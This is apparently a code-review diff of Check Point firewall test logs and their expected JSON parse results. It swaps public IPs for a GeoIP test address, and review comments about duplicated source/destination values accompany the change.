 <134>1 2020-03-30T07:20:35Z gw-da58d3 CheckPoint 7776 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819dc3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; time:"1594646954"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:"Drop"; flags:"278528"; ifdir:"inbound"; ifname:"bond1.3999"; loguid:"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}"; origin:"127.0.0.1"; originsicname:"CN=CP,O=cp.com.9jjkfo"; sequencenum:"62"; time:"1620217629"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]"; action_reason:"Dropped by multiportal infrastructure"; dst:"1.1.1.1"; product:"VPN & FireWall"; proto:"6"; s_port:"52780"; service:"80"; src:"1.1.1.1"]
\ No newline at end of file
+<134>1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:"Drop"; flags:"278528"; ifdir:"inbound"; ifname:"bond1.3999"; loguid:"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}"; origin:"127.0.0.1"; originsicname:"CN=CP,O=cp.com.9jjkfo"; sequencenum:"62"; time:"1620217629"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]"; action_reason:"Dropped by multiportal infrastructure"; dst:"81.2.69.144"; product:"VPN & FireWall"; proto:"6"; s_port:"52780"; service:"80"; src:"81.2.69.144"]
\ No newline at end of file
diff --git a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json
index bed2d1d35ce..c3f9b8014f7 100644
--- a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json
+++ b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint-with-time.log-expected.json
@@ -54,7 +54,7 @@
 },
 "event": {
 "sequence": 1,
- "ingested": "2021-06-30T09:24:17.429050600Z",
+ "ingested": "2021-12-09T13:31:18.614546900Z",
 "original": "\u003c134\u003e1 2020-03-30T07:20:35Z gw-da58d3 CheckPoint 7776 - [action:\"Accept\"; flags:\"444676\"; ifdir:\"outbound\"; ifname:\"eth0\"; logid:\"0\"; loguid:\"{0x5e819dc3,0x0,0x353707c7,0xee78a1dc}\"; origin:\"192.168.1.100\"; originsicname:\"cn=cp_mgmt,o=gw-da58d3..tmn8s8\"; sequencenum:\"1\"; time:\"1594646954\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\\]\"; dst:\"192.168.1.153\"; inzone:\"Local\"; layer_name:\"Network\"; layer_uuid:\"63b7fe60-76d2-4287-bca5-21af87337b0a\"; match_id:\"1\"; parent_rule:\"0\"; rule_action:\"Accept\"; rule_uid:\"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2\"; outzone:\"External\"; product:\"VPN-1 \u0026 FireWall-1\"; proto:\"17\"; s_port:\"43103\"; service:\"514\"; service_id:\"syslog\"; src:\"192.168.1.100\"]",
 "kind": "event",
 "action": "Accept",
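Review bot: The rewritten Drop record keeps `src` and `dst` as the same address, `dst:"81.2.69.144"; ... src:"81.2.69.144"`, so the regenerated expectation for it (the -75,41 hunk of test-checkpoint-with-time.log-expected.json) contains identical `source.geo`/`source.as` and `destination.geo`/`destination.as` blocks and cannot catch a source/destination mix-up in the pipeline's enrichment. The supported subset has more than one address, so giving `src` a different member of it would make the two enrichments distinguishable at no extra cost, and would also leave `related.ip` with two distinct entries. Both sides of this hunk also still end with `\ No newline at end of file`; since the file is being touched anyway, adding the trailing newline removes that marker from every future diff.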
@@ -75,41 +75,47 @@
 },
 "destination": {
 "geo": {
- "continent_name": "Oceania",
- "country_name": "Australia",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 143.2104,
- "lat": -33.494
- },
- "country_iso_code": "AU"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 13335,
+ "number": 20712,
 "organization": {
- "name": "Cloudflare, Inc."
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
 "port": 80,
- "ip": "1.1.1.1"
+ "ip": "81.2.69.144"
 },
 "source": {
 "geo": {
- "continent_name": "Oceania",
- "country_name": "Australia",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 143.2104,
- "lat": -33.494
- },
- "country_iso_code": "AU"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
 },
 "as": {
- "number": 13335,
+ "number": 20712,
 "organization": {
- "name": "Cloudflare, Inc."
+ "name": "Andrews \u0026 Arnold Ltd"
 }
 },
 "port": 52780,
- "ip": "1.1.1.1"
+ "ip": "81.2.69.144"
 },
 "tags": [
 "preserve_original_event"
@@ -135,14 +141,14 @@
 },
 "related": {
 "ip": [
- "1.1.1.1",
- "1.1.1.1"
+ "81.2.69.144",
+ "81.2.69.144"
 ]
 },
 "event": {
 "sequence": 62,
- "ingested": "2021-06-30T09:24:17.429066800Z",
- "original": "\u003c134\u003e1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:\"Drop\"; flags:\"278528\"; ifdir:\"inbound\"; ifname:\"bond1.3999\"; loguid:\"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}\"; origin:\"127.0.0.1\"; originsicname:\"CN=CP,O=cp.com.9jjkfo\"; sequencenum:\"62\"; time:\"1620217629\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]\"; action_reason:\"Dropped by multiportal infrastructure\"; dst:\"1.1.1.1\"; product:\"VPN \u0026 FireWall\"; proto:\"6\"; s_port:\"52780\"; service:\"80\"; src:\"1.1.1.1\"]",
+ "ingested": "2021-12-09T13:31:18.614555700Z",
+ "original": "\u003c134\u003e1 2021-05-05T12:27:09Z cp-m CheckPoint 1231 - [action:\"Drop\"; flags:\"278528\"; ifdir:\"inbound\"; ifname:\"bond1.3999\"; loguid:\"{0x60928f1d,0x8,0x40de101f,0xfcdbb197}\"; origin:\"127.0.0.1\"; originsicname:\"CN=CP,O=cp.com.9jjkfo\"; sequencenum:\"62\"; time:\"1620217629\"; version:\"5\"; __policy_id_tag:\"product=VPN-1 \u0026 FireWall-1[db_tag={F6212FB3-54CE-6344-9164-B224119E2B92};mgmt=cp-m;date=1620031791;policy_name=CP-Cluster]\"; action_reason:\"Dropped by multiportal infrastructure\"; dst:\"81.2.69.144\"; product:\"VPN \u0026 FireWall\"; proto:\"6\"; s_port:\"52780\"; service:\"80\"; src:\"81.2.69.144\"]",
 "kind": "event",
 "action": "Drop",
 "id": "{0x60928f1d,0x8,0x40de101f,0xfcdbb197}",
diff --git a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log
index 9e86bccac9c..e659322e65b 100644
--- a/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log
+++ b/packages/checkpoint/data_stream/firewall/_dev/test/pipeline/test-checkpoint.log
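Review bot: The regenerated `related.ip` for this record lists the same address twice, `+ "81.2.69.144",` followed by `+ "81.2.69.144"`, which is a direct consequence of `src` and `dst` being equal in the fixture. `related.*` fields are intended as a deduplicated set of pivot values, so the duplicate suggests the firewall pipeline's append processor for `related.ip` does not set `allow_duplicates: false` (I cannot see the pipeline from this diff, so please confirm); if so, that is a small follow-up fix, after which this expected file would need regenerating again. The duplication is pre-existing, since the old output listed `1.1.1.1` twice, and is not something this change introduces.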
@@ -1,20 +1,20 @@
 <134>1 2020-03-29T13:19:20Z gw-da58d3 CheckPoint 1930 - [flags:"133440"; ifdir:"inbound"; ifname:"daemon"; loguid:"{0x5e80a059,0x0,0x6401a8c0,0x3c7878a}"; origin:"192.168.1.100"; sequencenum:"1"; version:"5"; product:"System Monitor"; sys_message::"The eth0 interface is not protected by the anti-spoofing feature. Your network may be at risk"]
 <134>1 2020-03-29T13:19:21Z gw-da58d3 CheckPoint 1930 - [flags:"133440"; ifdir:"inbound"; ifname:"daemon"; loguid:"{0x5e80a059,0x2,0x6401a8c0,0x3c7878a}"; origin:"192.168.1.100"; sequencenum:"2"; version:"5"; product:"System Monitor"; sys_message::"installed Standard"]
 <134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46915"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"194.29.39.10"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61794"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26680"; xlatesrc:"0.0.0.0"]
+<134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"81.2.69.144"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61794"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26680"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T13:19:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80a05a,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={DF903A6D-B97D-1A4D-A054-2BF3A330CB5A};mgmt=gw-da58d3;date=1585487925;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36749"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:18:44Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; comment:"No update was found"; description:"Contracts"; product:"Security Gateway/Management"; status:"Finished"; update_service:"1"; version:"1.0"]
-<134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61180"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10860"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55039"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61180"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10860"; xlatesrc:"0.0.0.0"]
+<134>1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; log_delay:"1585523933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55039"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-30T01:18:44Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e8148f5,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; description:"Contracts"; product:"Security Gateway/Management"; status:"Started"; update_service:"1"; version:"1.0"]
-<134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51894"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"11157"; xlatesrc:"0.0.0.0"]
+<134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8148f6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51894"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"11157"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8148f6,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47919"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-30T01:18:46Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e8148f7,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; comment:"No update was found"; description:"Contracts"; product:"Security Gateway/Management"; status:"Finished"; update_service:"1"; version:"1.0"]
 <134>1 2020-03-30T06:12:45Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e818ddd,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:"166216"; ifdir:"outbound"; loguid:"{0x5e818de4,0x0,0x6401a8c0,0x108620ab}"; 
origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; db_ver:"20033003"; description:"Gateway was updated with database version: 22032001."; product:"Application Control"; severity:"1"; update_status:"updated"] <134>1 2020-03-30T06:12:51Z gw-da58d3 CheckPoint 8363 - [flags:"166216"; ifdir:"outbound"; loguid:"{0x5e818de4,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; db_ver:"20033003"; description:"Gateway was updated with database version: 22032001."; product:"URL Filtering"; severity:"1"; update_status:"updated"] <134>1 2020-03-30T06:13:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e818e01,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"] -<134>1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2.21.41.118"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"65488"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; 
tcp_packet_out_of_state:"First packet isn't SYN"] +<134>1 2020-03-30T06:13:42Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e818e17,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"81.2.69.144"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"65488"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"] <134>1 2020-03-30T07:18:59Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819d63,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-30T07:19:22Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819d7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; 
parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50024"; service:"137"; service_id:"nbname"; src:"192.168.1.196"] <134>1 2020-03-30T07:20:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e819dc1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60226"; service:"22"; service_id:"ssh"; src:"192.168.1.205"] diff --git 